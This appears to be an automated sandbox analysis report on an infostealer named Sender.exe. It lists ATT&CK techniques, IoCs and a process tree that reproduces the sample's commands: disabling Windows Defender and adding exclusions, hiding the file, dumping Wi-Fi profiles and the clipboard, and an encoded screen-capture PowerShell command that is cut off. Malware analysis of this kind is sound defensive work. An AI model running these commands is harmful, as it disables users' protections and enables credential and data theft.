f9f90327321311cc2692c254634937d5eab4e4930598619d425ed095fd3f1b63

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-01-2025 17:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sender.exe
Size

9.0MB
MD5

5b25a79e9b96b0369ea325759135e043
SHA1

bb4c6c35965c2f7406d564de8bd5d489d03c13f5
SHA256

f9f90327321311cc2692c254634937d5eab4e4930598619d425ed095fd3f1b63
SHA512

002dff9c7d628a9493d6772dff35b58adae83ba56a4a182650c01dbe6681d71b7d6cc5ba6c66ac995e8b28b8534a013356bc744fd38667f231c90ff063ab3479
SSDEEP

98304:OhLvITBg6vamaHl3Ne4i3lqoFhTWrf9eQc0MJYzwZNqkz+as5J1n6ksB0rN9RhC:ONIWeNlpYfMQc2s8hn6ksqdhC

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3728	powershell.exe
436	powershell.exe
4832	powershell.exe
3896	powershell.exe
2424	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Sender.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3356	cmd.exe
968	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1436	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe
456	Sender.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2400	tasklist.exe
916	tasklist.exe
2344	tasklist.exe
2588	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
452	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b4e-21.dat	upx
behavioral2/memory/456-25-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp	upx
behavioral2/files/0x000a000000023b41-27.dat	upx
behavioral2/files/0x000a000000023b4c-29.dat	upx
behavioral2/memory/456-30-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp	upx
behavioral2/memory/456-48-0x00007FFDA4A00000-0x00007FFDA4A0F000-memory.dmp	upx
behavioral2/files/0x000a000000023b48-47.dat	upx
behavioral2/files/0x000a000000023b47-46.dat	upx
behavioral2/files/0x000a000000023b46-45.dat	upx
behavioral2/files/0x000a000000023b45-44.dat	upx
behavioral2/files/0x000a000000023b44-43.dat	upx
behavioral2/files/0x000a000000023b43-42.dat	upx
behavioral2/files/0x000a000000023b42-41.dat	upx
behavioral2/files/0x000a000000023b40-40.dat	upx
behavioral2/files/0x000a000000023b53-39.dat	upx
behavioral2/files/0x000a000000023b52-38.dat	upx
behavioral2/files/0x000a000000023b51-37.dat	upx
behavioral2/files/0x000a000000023b4d-34.dat	upx
behavioral2/files/0x000a000000023b4b-33.dat	upx
behavioral2/memory/456-54-0x00007FFD9EFD0000-0x00007FFD9EFFD000-memory.dmp	upx
behavioral2/memory/456-56-0x00007FFD9EFB0000-0x00007FFD9EFC9000-memory.dmp	upx
behavioral2/memory/456-58-0x00007FFD9EE60000-0x00007FFD9EE83000-memory.dmp	upx
behavioral2/memory/456-60-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp	upx
behavioral2/memory/456-62-0x00007FFD9EE40000-0x00007FFD9EE59000-memory.dmp	upx
behavioral2/memory/456-64-0x00007FFD9FC10000-0x00007FFD9FC1D000-memory.dmp	upx
behavioral2/memory/456-66-0x00007FFD9E780000-0x00007FFD9E7AE000-memory.dmp	upx
behavioral2/memory/456-71-0x00007FFD97BB0000-0x00007FFD97C68000-memory.dmp	upx
behavioral2/memory/456-74-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp	upx
behavioral2/memory/456-83-0x00007FFD8EB70000-0x00007FFD8EC8C000-memory.dmp	upx
behavioral2/memory/456-82-0x00007FFD9EFB0000-0x00007FFD9EFC9000-memory.dmp	upx
behavioral2/memory/456-78-0x00007FFD9F790000-0x00007FFD9F79D000-memory.dmp	upx
behavioral2/memory/456-76-0x00007FFD9EE20000-0x00007FFD9EE34000-memory.dmp	upx
behavioral2/memory/456-72-0x00007FFD8EC90000-0x00007FFD8F005000-memory.dmp	upx
behavioral2/memory/456-70-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp	upx
behavioral2/memory/456-103-0x00007FFD9EE60000-0x00007FFD9EE83000-memory.dmp	upx
behavioral2/memory/456-143-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp	upx
behavioral2/memory/456-163-0x00007FFD9EE40000-0x00007FFD9EE59000-memory.dmp	upx
behavioral2/memory/456-249-0x00007FFD9E780000-0x00007FFD9E7AE000-memory.dmp	upx
behavioral2/memory/456-263-0x00007FFD97BB0000-0x00007FFD97C68000-memory.dmp	upx
behavioral2/memory/456-264-0x00007FFD8EC90000-0x00007FFD8F005000-memory.dmp	upx
behavioral2/memory/456-365-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp	upx
behavioral2/memory/456-371-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp	upx
behavioral2/memory/456-366-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp	upx
behavioral2/memory/456-726-0x00007FFDA4AD0000-0x00007FFDA4AF4000-memory.dmp	upx
behavioral2/memory/456-743-0x00007FFD9EE60000-0x00007FFD9EE83000-memory.dmp	upx
behavioral2/memory/456-748-0x00007FFD97BB0000-0x00007FFD97C68000-memory.dmp	upx
behavioral2/memory/456-749-0x00007FFD8EC90000-0x00007FFD8F005000-memory.dmp	upx
behavioral2/memory/456-747-0x00007FFD9E780000-0x00007FFD9E7AE000-memory.dmp	upx
behavioral2/memory/456-746-0x00007FFD9FC10000-0x00007FFD9FC1D000-memory.dmp	upx
behavioral2/memory/456-745-0x00007FFD9EE40000-0x00007FFD9EE59000-memory.dmp	upx
behavioral2/memory/456-744-0x00007FFD8F3C0000-0x00007FFD8F530000-memory.dmp	upx
behavioral2/memory/456-742-0x00007FFD9EFB0000-0x00007FFD9EFC9000-memory.dmp	upx
behavioral2/memory/456-741-0x00007FFD9EFD0000-0x00007FFD9EFFD000-memory.dmp	upx
behavioral2/memory/456-740-0x00007FFDA4A00000-0x00007FFDA4A0F000-memory.dmp	upx
behavioral2/memory/456-739-0x00007FFD8EB70000-0x00007FFD8EC8C000-memory.dmp	upx
behavioral2/memory/456-738-0x00007FFD9F790000-0x00007FFD9F79D000-memory.dmp	upx
behavioral2/memory/456-737-0x00007FFD9EE20000-0x00007FFD9EE34000-memory.dmp	upx
behavioral2/memory/456-725-0x00007FFD8F530000-0x00007FFD8FB19000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3028	cmd.exe
1984	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5112	cmd.exe
1668	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3936	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4276	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133813487978415334"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1984	PING.EXE

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
3896	powershell.exe
3728	powershell.exe
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
3728	powershell.exe
3728	powershell.exe
3896	powershell.exe
3896	powershell.exe
968	powershell.exe
968	powershell.exe
968	powershell.exe
4580	powershell.exe
4580	powershell.exe
4580	powershell.exe
436	powershell.exe
436	powershell.exe
436	powershell.exe
1924	chrome.exe
1924	chrome.exe
1096	powershell.exe
1096	powershell.exe
1096	powershell.exe
4832	powershell.exe
4832	powershell.exe
4832	powershell.exe
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2400	tasklist.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	916	tasklist.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe
Token: 34	1544	WMIC.exe
Token: 35	1544	WMIC.exe
Token: 36	1544	WMIC.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe
Token: 34	1544	WMIC.exe
Token: 35	1544	WMIC.exe
Token: 36	1544	WMIC.exe
Token: SeDebugPrivilege	2344	tasklist.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	2588	tasklist.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeShutdownPrivilege	1924	chrome.exe
Token: SeCreatePagefilePrivilege	1924	chrome.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeShutdownPrivilege	1924	chrome.exe
Token: SeCreatePagefilePrivilege	1924	chrome.exe
Token: SeShutdownPrivilege	1924	chrome.exe
Token: SeCreatePagefilePrivilege	1924	chrome.exe
Token: SeIncreaseQuotaPrivilege	1672	WMIC.exe
Token: SeSecurityPrivilege	1672	WMIC.exe
Token: SeTakeOwnershipPrivilege	1672	WMIC.exe
Token: SeLoadDriverPrivilege	1672	WMIC.exe
Token: SeSystemProfilePrivilege	1672	WMIC.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe
1924	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 456	1116	Sender.exe	83
PID 1116 wrote to memory of 456	1116	Sender.exe	83
PID 456 wrote to memory of 2652	456	Sender.exe	84
PID 456 wrote to memory of 2652	456	Sender.exe	84
PID 456 wrote to memory of 3768	456	Sender.exe	85
PID 456 wrote to memory of 3768	456	Sender.exe	85
PID 456 wrote to memory of 452	456	Sender.exe	86
PID 456 wrote to memory of 452	456	Sender.exe	86
PID 456 wrote to memory of 3336	456	Sender.exe	90
PID 456 wrote to memory of 3336	456	Sender.exe	90
PID 456 wrote to memory of 5088	456	Sender.exe	92
PID 456 wrote to memory of 5088	456	Sender.exe	92
PID 456 wrote to memory of 4684	456	Sender.exe	93
PID 456 wrote to memory of 4684	456	Sender.exe	93
PID 4684 wrote to memory of 2400	4684	cmd.exe	96
PID 4684 wrote to memory of 2400	4684	cmd.exe	96
PID 452 wrote to memory of 3096	452	cmd.exe	97
PID 452 wrote to memory of 3096	452	cmd.exe	97
PID 2652 wrote to memory of 2424	2652	cmd.exe	98
PID 2652 wrote to memory of 2424	2652	cmd.exe	98
PID 3768 wrote to memory of 3728	3768	cmd.exe	99
PID 3768 wrote to memory of 3728	3768	cmd.exe	99
PID 3336 wrote to memory of 3896	3336	cmd.exe	100
PID 3336 wrote to memory of 3896	3336	cmd.exe	100
PID 5088 wrote to memory of 916	5088	cmd.exe	101
PID 5088 wrote to memory of 916	5088	cmd.exe	101
PID 456 wrote to memory of 2548	456	Sender.exe	103
PID 456 wrote to memory of 2548	456	Sender.exe	103
PID 456 wrote to memory of 3356	456	Sender.exe	175
PID 456 wrote to memory of 3356	456	Sender.exe	175
PID 456 wrote to memory of 3276	456	Sender.exe	107
PID 456 wrote to memory of 3276	456	Sender.exe	107
PID 456 wrote to memory of 3644	456	Sender.exe	108
PID 456 wrote to memory of 3644	456	Sender.exe	108
PID 456 wrote to memory of 5112	456	Sender.exe	110
PID 456 wrote to memory of 5112	456	Sender.exe	110
PID 456 wrote to memory of 1444	456	Sender.exe	112
PID 456 wrote to memory of 1444	456	Sender.exe	112
PID 456 wrote to memory of 1072	456	Sender.exe	113
PID 456 wrote to memory of 1072	456	Sender.exe	113
PID 456 wrote to memory of 3576	456	Sender.exe	115
PID 456 wrote to memory of 3576	456	Sender.exe	115
PID 2548 wrote to memory of 1544	2548	cmd.exe	119
PID 2548 wrote to memory of 1544	2548	cmd.exe	119
PID 3356 wrote to memory of 968	3356	cmd.exe	120
PID 3356 wrote to memory of 968	3356	cmd.exe	120
PID 1072 wrote to memory of 2000	1072	cmd.exe	122
PID 1072 wrote to memory of 2000	1072	cmd.exe	122
PID 3276 wrote to memory of 2344	3276	cmd.exe	123
PID 3276 wrote to memory of 2344	3276	cmd.exe	123
PID 5112 wrote to memory of 1668	5112	cmd.exe	124
PID 5112 wrote to memory of 1668	5112	cmd.exe	124
PID 3644 wrote to memory of 116	3644	cmd.exe	125
PID 3644 wrote to memory of 116	3644	cmd.exe	125
PID 3576 wrote to memory of 4580	3576	cmd.exe	167
PID 3576 wrote to memory of 4580	3576	cmd.exe	167
PID 1444 wrote to memory of 4276	1444	cmd.exe	127
PID 1444 wrote to memory of 4276	1444	cmd.exe	127
PID 456 wrote to memory of 2792	456	Sender.exe	186
PID 456 wrote to memory of 2792	456	Sender.exe	186
PID 456 wrote to memory of 2152	456	Sender.exe	150
PID 456 wrote to memory of 2152	456	Sender.exe	150
PID 2792 wrote to memory of 2224	2792	cmd.exe	132
PID 2792 wrote to memory of 2224	2792	cmd.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3096	attrib.exe
2224	attrib.exe
1832	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Sender.exe
"C:\Users\Admin\AppData\Local\Temp\Sender.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Users\Admin\AppData\Local\Temp\Sender.exe
  "C:\Users\Admin\AppData\Local\Temp\Sender.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sender.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sender.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Sender.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Sender.exe"
      4⤵
      Views/modifies file attributes
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5088
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3276
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3644
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0AC